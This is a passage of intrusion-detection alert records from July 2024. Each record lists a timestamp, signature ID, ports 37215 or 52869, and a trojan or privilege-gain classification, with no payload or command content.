                      Timestamp:07/20/24-23:01:27.664887
                      SID:2829579
                      Source Port:32876
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.392528
                      SID:2027339
                      Source Port:53270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.376572
                      SID:2027339
                      Source Port:51538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2027339
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.275988
                      SID:2027339
                      Source Port:48426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2835222
                      Source Port:52194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221888
                      SID:2829579
                      Source Port:47604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.630543
                      SID:2829579
                      Source Port:43640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.157005
                      SID:2025132
                      Source Port:44414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:37398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.650744
                      SID:2027339
                      Source Port:53702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2829579
                      Source Port:56890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.484881
                      SID:2027339
                      Source Port:59906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.535137
                      SID:2831300
                      Source Port:43620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.213822
                      SID:2831300
                      Source Port:43154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.375005
                      SID:2027339
                      Source Port:54766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.196522
                      SID:2027339
                      Source Port:57156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2831300
                      Source Port:44004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044537
                      SID:2829579
                      Source Port:52198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.190671
                      SID:2027339
                      Source Port:45934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2835222
                      Source Port:57988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.423677
                      SID:2831300
                      Source Port:35350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221570
                      SID:2829579
                      Source Port:43176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.535137
                      SID:2025132
                      Source Port:56094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.437265
                      SID:2027339
                      Source Port:56658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.498157
                      SID:2831300
                      Source Port:56966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2027339
                      Source Port:53548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.326437
                      SID:2025132
                      Source Port:48448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:46618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.560530
                      SID:2027339
                      Source Port:59256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2025132
                      Source Port:51644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.262010
                      SID:2027339
                      Source Port:40522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.739839
                      SID:2027339
                      Source Port:44240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590938
                      SID:2027339
                      Source Port:39990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.014688
                      SID:2835222
                      Source Port:49028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2027339
                      Source Port:56760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2835222
                      Source Port:33910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649945
                      SID:2829579
                      Source Port:41624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.392527
                      SID:2027339
                      Source Port:48730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.302920
                      SID:2831300
                      Source Port:33286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.333805
                      SID:2831300
                      Source Port:36734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.946258
                      SID:2025132
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.242934
                      SID:2027339
                      Source Port:46470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.072641
                      SID:2831300
                      Source Port:50632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:11.506914
                      SID:2025132
                      Source Port:36974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.810143
                      SID:2831300
                      Source Port:37980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.380677
                      SID:2025132
                      Source Port:46780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.422220
                      SID:2025132
                      Source Port:44736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.972472
                      SID:2027339
                      Source Port:37332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.591880
                      SID:2027339
                      Source Port:50890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221803
                      SID:2829579
                      Source Port:53230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.340763
                      SID:2025132
                      Source Port:54042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.099889
                      SID:2025132
                      Source Port:38954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.632123
                      SID:2027339
                      Source Port:37554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.390246
                      SID:2027339
                      Source Port:54968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590754
                      SID:2027339
                      Source Port:56354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.490945
                      SID:2831300
                      Source Port:36502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.948226
                      SID:2025132
                      Source Port:42126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.572503
                      SID:2027339
                      Source Port:46268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2835222
                      Source Port:43318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2835222
                      Source Port:59048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806024
                      SID:2027339
                      Source Port:47288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.165780
                      SID:2027339
                      Source Port:51498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2835222
                      Source Port:45192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.409249
                      SID:2027339
                      Source Port:58652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.767225
                      SID:2831300
                      Source Port:33734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.164622
                      SID:2025132
                      Source Port:43644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.070705
                      SID:2025132
                      Source Port:34608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:26.791106
                      SID:2025132
                      Source Port:49314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.426363
                      SID:2025132
                      Source Port:34988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.739839
                      SID:2025132
                      Source Port:44240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2831300
                      Source Port:43308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.274813
                      SID:2025132
                      Source Port:60748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:38312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.570955
                      SID:2025132
                      Source Port:51478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.084135
                      SID:2025132
                      Source Port:36338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:06.553447
                      SID:2831300
                      Source Port:59228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.071126
                      SID:2025132
                      Source Port:42976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.883171
                      SID:2829579
                      Source Port:46870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.119426
                      SID:2831300
                      Source Port:53402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.477726
                      SID:2027339
                      Source Port:35428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.321968
                      SID:2831300
                      Source Port:43566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.170008
                      SID:2027339
                      Source Port:60616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.525128
                      SID:2027339
                      Source Port:47322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.400580
                      SID:2027339
                      Source Port:43012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321964
                      SID:2835222
                      Source Port:46232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.374542
                      SID:2025132
                      Source Port:38602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2829579
                      Source Port:53838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.322405
                      SID:2027339
                      Source Port:59520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.496839
                      SID:2025132
                      Source Port:52330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.746309
                      SID:2025132
                      Source Port:40366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.118041
                      SID:2025132
                      Source Port:59874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.147980
                      SID:2027339
                      Source Port:56000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2829579
                      Source Port:57564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.945748
                      SID:2027339
                      Source Port:54138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.252357
                      SID:2027339
                      Source Port:45926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.333866
                      SID:2027339
                      Source Port:33564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2831300
                      Source Port:47578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2025132
                      Source Port:57818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.267115
                      SID:2027339
                      Source Port:54964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221921
                      SID:2835222
                      Source Port:49826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634497
                      SID:2835222
                      Source Port:41366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.359091
                      SID:2027339
                      Source Port:50814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.464448
                      SID:2027339
                      Source Port:44136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.362240
                      SID:2027339
                      Source Port:42968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.466755
                      SID:2025132
                      Source Port:60066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.954400
                      SID:2027339
                      Source Port:53534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.454682
                      SID:2027339
                      Source Port:59644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:59576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:60820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2027339
                      Source Port:38658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.034952
                      SID:2829579
                      Source Port:51042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.947663
                      SID:2025132
                      Source Port:40290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.096837
                      SID:2831300
                      Source Port:49762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.117066
                      SID:2835222
                      Source Port:55386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2829579
                      Source Port:43814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:46764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.740527
                      SID:2025132
                      Source Port:36918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.444817
                      SID:2027339
                      Source Port:54294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.299586
                      SID:2025132
                      Source Port:47142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.943881
                      SID:2025132
                      Source Port:49940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.045640
                      SID:2829579
                      Source Port:49936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2027339
                      Source Port:46372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321964
                      SID:2835222
                      Source Port:46110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.165438
                      SID:2027339
                      Source Port:51560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.259207
                      SID:2027339
                      Source Port:49352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:37952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.990165
                      SID:2829579
                      Source Port:46280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2027339
                      Source Port:36920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.880524
                      SID:2025132
                      Source Port:59136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.663162
                      SID:2831300
                      Source Port:33472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.656128
                      SID:2829579
                      Source Port:52098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2829579
                      Source Port:48384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.490945
                      SID:2027339
                      Source Port:59242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.073087
                      SID:2829579
                      Source Port:42264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.819848
                      SID:2025132
                      Source Port:38288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2027339
                      Source Port:42410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.470759
                      SID:2027339
                      Source Port:57332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2835222
                      Source Port:47294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.381812
                      SID:2025132
                      Source Port:53042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.090902
                      SID:2027339
                      Source Port:37696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.925226
                      SID:2027339
                      Source Port:54556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2829579
                      Source Port:34462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.735617
                      SID:2829579
                      Source Port:59152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.024843
                      SID:2027339
                      Source Port:59990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.631925
                      SID:2831300
                      Source Port:34438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.947418
                      SID:2831300
                      Source Port:44360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.914948
                      SID:2027339
                      Source Port:36136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641803
                      SID:2829579
                      Source Port:47982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:55438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:35292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.020551
                      SID:2027339
                      Source Port:46324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.935242
                      SID:2025132
                      Source Port:45436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.056416
                      SID:2027339
                      Source Port:55060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.509837
                      SID:2027339
                      Source Port:38436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:46448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.341391
                      SID:2025132
                      Source Port:37840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.628217
                      SID:2025132
                      Source Port:38982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.837053
                      SID:2027339
                      Source Port:49994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.763318
                      SID:2027339
                      Source Port:46986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.868779
                      SID:2027339
                      Source Port:54574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.879276
                      SID:2831300
                      Source Port:48450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.123752
                      SID:2025132
                      Source Port:37998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2835222
                      Source Port:58620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.776719
                      SID:2027339
                      Source Port:39014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.957638
                      SID:2831300
                      Source Port:47288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.668073
                      SID:2829579
                      Source Port:60144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2829579
                      Source Port:49558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.802130
                      SID:2025132
                      Source Port:57742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2829579
                      Source Port:53606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.002255
                      SID:2027339
                      Source Port:59450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2829579
                      Source Port:48300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.415663
                      SID:2027339
                      Source Port:56738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.096458
                      SID:2027339
                      Source Port:59468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2829579
                      Source Port:51534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.796791
                      SID:2025132
                      Source Port:57286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.096471
                      SID:2027339
                      Source Port:44870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2829579
                      Source Port:36212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.439012
                      SID:2027339
                      Source Port:50128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.036012
                      SID:2831300
                      Source Port:51362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2835222
                      Source Port:34426
